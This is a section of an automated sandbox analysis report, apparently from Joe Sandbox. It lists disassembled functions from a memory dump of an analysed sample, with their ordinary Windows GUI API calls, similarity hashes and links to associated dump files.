Instruction ID: d09234f7a3a04e5afaee16ffa69f5ea50ee5aa36afd3bb4699d164ead080cd57
Opcode Fuzzy Hash: 7bd4364ee89034073b6b12c282cb8b49070771de6c3ed8f0e40930b456d101c3
Instruction Fuzzy Hash: 80319A36A00244EFCB269F78DC44AB97BF5EB88350F1585A9F614CB271DB329844CB60

Function 00C0AF1E Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 00C0AF57
InflateRect.USER32(?,000000FF,000000FF), ref: 00C0AF86
InflateRect.USER32(?,?,?), ref: 00C0AFE8
InflateRect.USER32(?,00000001,00000001), ref: 00C0B004

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: InflateRect
String ID:
API String ID: 2073123975-0
Opcode ID: 31d3bcbbda08e7fb2b781fd924d9977ac77f389d2eb27c0dcda2bbf13d8bf4be
Instruction ID: 6fb52b77ac049cd4b66d14c7b3248a59d31b2ef3326a7772cab37dafa840ea90
Opcode Fuzzy Hash: 31d3bcbbda08e7fb2b781fd924d9977ac77f389d2eb27c0dcda2bbf13d8bf4be
Instruction Fuzzy Hash: 07315CB290434DAFCF00DF999C84EBA37ADFB48320B140616F625D72D0D630E915DB61

Function 00BF6CF5 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BF6D49

Part of subcall function 00BE2429: GetWindowLongA.USER32(?,000000EC), ref: 00BE2434

OffsetRect.USER32(?,?,00000000), ref: 00BF6DA4
UnionRect.USER32(?,?,?), ref: 00BF6DC2
EqualRect.USER32(?,?), ref: 00BF6DD0
UpdateWindow.USER32(?), ref: 00BF6E0C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window$EqualLongOffsetUnionUpdate
String ID:
API String ID: 4261707372-0
Opcode ID: 978cfe2572e5b61ba24f24afb10ad967f9ffaab3899e87f0f7e7df0e8223e135
Instruction ID: 69002fd157474e92bd9d57a8e42d8f27f503eca7673582e5ae08bcc56d04d91c
Opcode Fuzzy Hash: 978cfe2572e5b61ba24f24afb10ad967f9ffaab3899e87f0f7e7df0e8223e135
Instruction Fuzzy Hash: 803141B6900209EFCB10DFA9D984AEEBBF9FF48310F10466EE516E3251DB30A945DB50

Function 00C6964C Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00C68E18: GetParent.USER32(?), ref: 00C68E24
Part of subcall function 00C68E18: GetParent.USER32(00000000), ref: 00C68E27

GetWindowLongA.USER32(?,000000EC), ref: 00C696BB
RedrawWindow.USER32(?,00000000,00000000,00000081,?,?,?,?,?,00C69A67,00000000), ref: 00C6970C
SetWindowLongA.USER32(?,000000EC,?), ref: 00C6971B
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137,?,?,?,?,?,00C69A67,00000000), ref: 00C69731
GetClientRect.USER32(?,?), ref: 00C69745

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$LongParent$ClientRectRedraw
String ID:
API String ID: 556606033-0
Opcode ID: 842970b60bf4ef70ce3676869e88d910999ab299caa79d47ad0ae5a76bfa4a66
Instruction ID: 0e04bbb6b464745cd62a75f7745504010b2ec57cd147ef635cc8b280f68afd40
Opcode Fuzzy Hash: 842970b60bf4ef70ce3676869e88d910999ab299caa79d47ad0ae5a76bfa4a66
Instruction Fuzzy Hash: EF21D672620284AFDF356F65CCC5AAE7ABDEB84350F110838F22696090DA31AE40C610

Function 00C2D710 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C2D735
SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 00C2D7C8
GetParent.USER32(?), ref: 00C2D7D4
GetWindowLongA.USER32(?,000000F4), ref: 00C2D7EE
SendMessageA.USER32(?,00000111,?), ref: 00C2D7FE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageParentSend$LongWindow
String ID:
API String ID: 2933145521-0
Opcode ID: 56670f52497ae822d847e428ae43d1e17c2b64bd636b5db87efe426b8db8577e
Instruction ID: e6d451178df78a43ad887f4f69c2ec55a7c0d7f5d61c9ff044632f3fc26c08d5
Opcode Fuzzy Hash: 56670f52497ae822d847e428ae43d1e17c2b64bd636b5db87efe426b8db8577e
Instruction Fuzzy Hash: 62213532604264BFDB20AB71DC84BAEBAE9FF54750F210569F92797590EB34DD40C690

Function 00BFC3BE Relevance: 7.6, APIs: 5, Instructions: 92windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BFC40A
GetClientRect.USER32(?,?), ref: 00BFC44B
PtInRect.USER32(?,?,?), ref: 00BFC463
MapWindowPoints.USER32(?,?,?,00000001), ref: 00BFC48D
SendMessageA.USER32(?,00000200,?,?), ref: 00BFC4AC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientCursorMessagePointsSendWindow
String ID:
API String ID: 1257894355-0
Opcode ID: e2b8b82f83a73f55d70e72c1001dde90afdf9802506d0ae83cadffe744f1baf4
Instruction ID: a5c4e0ef2df65d95112805a620e18246c1751ae54cc62d3566a391fbf49ac6bc
Opcode Fuzzy Hash: e2b8b82f83a73f55d70e72c1001dde90afdf9802506d0ae83cadffe744f1baf4
Instruction Fuzzy Hash: 5B315E71A0024EAFCB04DFA5CD949BEBBB9FF48300B10816AF91597261DB30A954DBA0

Function 00BE73E7 Relevance: 7.6, APIs: 5, Instructions: 92windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE73EE
CreateRectRgnIndirect.GDI32(?), ref: 00BE7410

Part of subcall function 00BD7FC9: SelectClipRgn.GDI32(?,00000000), ref: 00BD7FEF
Part of subcall function 00BD7FC9: SelectClipRgn.GDI32(?,?), ref: 00BD8005

GetParent.USER32(?), ref: 00BE7430
MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00BE7488
SendMessageA.USER32(?,00000014,?,00000000), ref: 00BE74B5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClipSelect$CreateH_prolog3IndirectMessageParentPointsRectSendWindow
String ID:
API String ID: 3362736716-0
Opcode ID: ade7f3f1cef95b1bd23f1342dd6c12386be363ee33e89ba70835419c224d8fe6
Instruction ID: f535f51ca42716fae783eefd93fa5afb8de8440614a99eb67e08087c0ba57c0b
Opcode Fuzzy Hash: ade7f3f1cef95b1bd23f1342dd6c12386be363ee33e89ba70835419c224d8fe6
Instruction Fuzzy Hash: 12310A71A4025AAFCF14DFA4CD85AAEBBF5FF08300F104569F915AB290EB309E018B90

Function 00C16778 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000040D,00000000,00000000), ref: 00C167C2
SendMessageA.USER32(?,0000040D,00000000,00000000), ref: 00C167DE
SendMessageA.USER32(?,0000040D,00000000,00000000), ref: 00C16821

Part of subcall function 00C55B98: SendMessageA.USER32(?,00000405,00000000,?), ref: 00C55BCB

SendMessageA.USER32(?,0000040D,00000000,00000000), ref: 00C1680C
SetRectEmpty.USER32(?), ref: 00C16841

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$EmptyRect
String ID:
API String ID: 4004678023-0
Opcode ID: 243bccc6df25956b42d7e9efd3ffebc2f3220d2658726fbb402d9ae15c5f63cb
Instruction ID: 5428c3c56909eba292b94a235ede6d500b98e45df23863e869acffe87ef3b90a
Opcode Fuzzy Hash: 243bccc6df25956b42d7e9efd3ffebc2f3220d2658726fbb402d9ae15c5f63cb
Instruction Fuzzy Hash: 7D312DB1900209AFDB14DF69CC82EEEBBF8FF49340F11056DE655A7291DA70AD819B90

Function 00C6984F Relevance: 7.6, APIs: 5, Instructions: 90windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

Part of subcall function 00C68E18: GetParent.USER32(?), ref: 00C68E24
Part of subcall function 00C68E18: GetParent.USER32(00000000), ref: 00C68E27

SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00C698CA
SendMessageA.USER32(?,00000229,00000000,00000000), ref: 00C698F1
SendMessageA.USER32(?,00000229,00000000,00000000), ref: 00C6990E
SendMessageA.USER32(?,00000222,?,00000000), ref: 00C69925
SendMessageA.USER32(?,00000222,00000000,?), ref: 00C6994A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$Parent$LongWindow
String ID:
API String ID: 4191550487-0
Opcode ID: c27c19f676e8b2864520f4bc8c49509d947bb0f11e130cd582caa5ef0075321d
Instruction ID: fa6a4c5d15886c3b20b113e318c6074fb1cc24a704020587001f493ecd3bdd63
Opcode Fuzzy Hash: c27c19f676e8b2864520f4bc8c49509d947bb0f11e130cd582caa5ef0075321d
Instruction Fuzzy Hash: 6421BF32710208BAEF296B24CCC6FED665DEB48710F14013AF625AB1C1DAB1AD809691

Function 00C6E80F Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C6E852
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00C6E885
GetWindowRect.USER32(?,?), ref: 00C6E894
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00C6E8EA
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 00C6E8FC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$MessageSend$RectRedrawVisible
String ID:
API String ID: 1695962874-0
Opcode ID: 4881247571dc2dbad94dd5f6688770b13fe6c5ced05036ef7b37ec64e46f6abc
Instruction ID: 5de97870183b1464b863e273432a16034b0d1b97abfcdc04b64de38da4f44801
Opcode Fuzzy Hash: 4881247571dc2dbad94dd5f6688770b13fe6c5ced05036ef7b37ec64e46f6abc
Instruction Fuzzy Hash: 01310F71900245AFCB21DFA9CD88EAEBBF9FB89710F10465AF565A71A0C771AA00DB10

Function 00C3C83B Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C3C865
IsWindow.USER32(?), ref: 00C3C8F2
InflateRect.USER32(?,?,?), ref: 00C3C913
InvalidateRect.USER32(?,?,00000001), ref: 00C3C925
UpdateWindow.USER32(?), ref: 00C3C931

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Rect$InflateInvalidateUpdate
String ID:
API String ID: 2730120201-0
Opcode ID: 592c3ffe1c507e87d20e12e340680fbf6320934315632008241fd4f1f215d3a4
Instruction ID: 2d9b34533f2ef4a85cd82454cefa4c69f8698371d19be4e0291efc24394958a2
Opcode Fuzzy Hash: 592c3ffe1c507e87d20e12e340680fbf6320934315632008241fd4f1f215d3a4
Instruction Fuzzy Hash: 4A31E2722102059FDB10EF65C984FAA77B9BF48300F0940B4ED49DF2A6DB31E905CB61

Function 00C429E7 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C42A40
GetWindowRect.USER32(?,?), ref: 00C42A63
PtInRect.USER32(?,?,?), ref: 00C42A6F
GetWindowRect.USER32(?,?), ref: 00C42A8D
PtInRect.USER32(?,?,?), ref: 00C42A9A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window
String ID:
API String ID: 924285169-0
Opcode ID: 1dc42ad20bdb8d26732273ed16f533c6bdb6c652750bd064e744a431326df22d
Instruction ID: d29b718708afd5e7f5b87c6b78e79dca961647e246a8ca5fef5b8b90b892cabf
Opcode Fuzzy Hash: 1dc42ad20bdb8d26732273ed16f533c6bdb6c652750bd064e744a431326df22d
Instruction Fuzzy Hash: 1A31E771E10219EFCB11DFA9D9859AEBBF8FB4C750B14406AF815E3210D7709A40DFA0

Function 00C4A0E1 Relevance: 7.6, APIs: 5, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C4A121
MapWindowPoints.USER32(?,?,?,00000002), ref: 00C4A134
PtInRect.USER32(?,?,?), ref: 00C4A144
MapWindowPoints.USER32(?,?,?,00000001), ref: 00C4A173
SendMessageA.USER32(?,00000203,?,?), ref: 00C4A192

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: PointsRectWindow$ClientMessageSend
String ID:
API String ID: 3885650166-0
Opcode ID: 0ee532e76fdf816e4034b4ca82407d76d32a3d134cad26cf1d4cd6486355befc
Instruction ID: 8e1b8c89edd28eab89ed7aee8f09415b928dd7f149359dc8c107b249cc4b2717
Opcode Fuzzy Hash: 0ee532e76fdf816e4034b4ca82407d76d32a3d134cad26cf1d4cd6486355befc
Instruction Fuzzy Hash: 88212A72500209EFDB15DF64CC48EAE7BB9FB08310B104529F956D6160EB31EE10DB51

Function 00BDFB39 Relevance: 7.6, APIs: 5, Instructions: 80windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BDFB43
GetTopWindow.USER32(00000000), ref: 00BDFB68
GetDlgCtrlID.USER32(00000000), ref: 00BDFB7A
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00BDFBD6
GetWindow.USER32(00000000,00000002), ref: 00BDFC16

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: d4bdea3dec70765edc5caeed3c7a731228a6260e75b31ff9ce922ce302994e50
Instruction ID: 48c95c563ba8c33560878b8284a96a83460f2c03dd6ba5de27a02fea1982d3b1
Opcode Fuzzy Hash: d4bdea3dec70765edc5caeed3c7a731228a6260e75b31ff9ce922ce302994e50
Instruction Fuzzy Hash: 8021C17190421AAFDB25AB64DC84FBEFAF4EF55300F1441ABF412A6291EB304E81DB61

Function 00C6ECC0 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C6ECC7
SendMessageA.USER32(?,0000007F,00000000,00000000), ref: 00C6ECEE
SendMessageA.USER32(?,0000007F,00000001,00000000), ref: 00C6ED02
GetClassLongA.USER32(?,000000DE), ref: 00C6ED7A
GetClassLongA.USER32(?,000000F2), ref: 00C6ED88

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClassLongMessageSend$H_prolog3
String ID:
API String ID: 350087385-0
Opcode ID: 3bb86da641a4843250b598ec4d186eb2a7bb1c2a0758db1f6cb7c94f504bf870
Instruction ID: 11bc259b1224ffc77292c3e1e2f5b2c6248b5928c16014435fac0ef3a9a16dac
Opcode Fuzzy Hash: 3bb86da641a4843250b598ec4d186eb2a7bb1c2a0758db1f6cb7c94f504bf870
Instruction Fuzzy Hash: A8218375A00215ABDB31FB65CCC2FAE73B4AF55720F120355F920BB2E2DA60AD40DB51

Function 00BF499A Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF43FB: __EH_prolog3_GS.LIBCMT ref: 00BF4402
Part of subcall function 00BF43FB: GetWindowRect.USER32(?,?), ref: 00BF4443
Part of subcall function 00BF43FB: CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 00BF446D
Part of subcall function 00BF43FB: SetWindowRgn.USER32(?,?,00000000), ref: 00BF4483

GetSystemMenu.USER32(?,00000000), ref: 00BF4A0E
DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 00BF4A2F
DeleteMenu.USER32(?,0000F020,00000000), ref: 00BF4A3B
DeleteMenu.USER32(?,0000F030,00000000), ref: 00BF4A47
EnableMenuItem.USER32(?,0000F060,00000001), ref: 00BF4A61

Part of subcall function 00BED60C: SetRectEmpty.USER32(?), ref: 00BED63F
Part of subcall function 00BED60C: ReleaseCapture.USER32 ref: 00BED645
Part of subcall function 00BED60C: SetCapture.USER32(?), ref: 00BED654
Part of subcall function 00BED60C: GetCapture.USER32 ref: 00BED696
Part of subcall function 00BED60C: ReleaseCapture.USER32 ref: 00BED6A6
Part of subcall function 00BED60C: SetCapture.USER32(?), ref: 00BED6B5
Part of subcall function 00BED60C: RedrawWindow.USER32(?,?,?,00000505), ref: 00BED720

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CaptureMenu$DeleteRectWindow$Release$CreateEmptyEnableH_prolog3_ItemRedrawRoundSystem
String ID:
API String ID: 2818640433-0
Opcode ID: 118fac820bf8e745881f185e21cbb50212008e84fb9a5912aed6a74a02861f7b
Instruction ID: 1addd0d6ed80aaf1f8f769af97eefaf23a9b036e5d6df54429c946d64142e017
Opcode Fuzzy Hash: 118fac820bf8e745881f185e21cbb50212008e84fb9a5912aed6a74a02861f7b
Instruction Fuzzy Hash: 8B219D71740218BFDB216B21CC8AF7E7BA9EF44750F0440B6F6059B1A2CB719C14DB91

Function 00C30001 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,00000000), ref: 00C30027

Part of subcall function 00BE2FE9: DeleteObject.GDI32(00000000), ref: 00BE3002

SelectObject.GDI32(?,00000000), ref: 00C3003D
DeleteObject.GDI32(00000000), ref: 00C300A8
DeleteDC.GDI32(00000000), ref: 00C300B7
LeaveCriticalSection.KERNEL32(00D3420C), ref: 00C300D0

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Delete$Select$CriticalLeaveSection
String ID:
API String ID: 3849354926-0
Opcode ID: 7cd04cec234201eb0811540c7a089ea519bf0ed9844b10adbba4c6878c4aa26f
Instruction ID: d3b3c772ed605881faa2249279ecaebb05eb6b880f0d727f0c31bf4d976010ac
Opcode Fuzzy Hash: 7cd04cec234201eb0811540c7a089ea519bf0ed9844b10adbba4c6878c4aa26f
Instruction Fuzzy Hash: EF219D72900204DFCF05EFA5DC80A9ABFA5FF94351B1081A6E9249F266DB71E941CFA1

Function 00C23365 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00BD82B9: __EH_prolog3.LIBCMT ref: 00BD82C0
Part of subcall function 00BD82B9: GetDC.USER32(00000000), ref: 00BD82EC

IsRectEmpty.USER32(?), ref: 00C2338E
InvertRect.USER32(?,?), ref: 00C2339C
SetRectEmpty.USER32(?), ref: 00C233AC
GetClientRect.USER32(?,?), ref: 00C233C9
InvertRect.USER32(?,?), ref: 00C23416

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

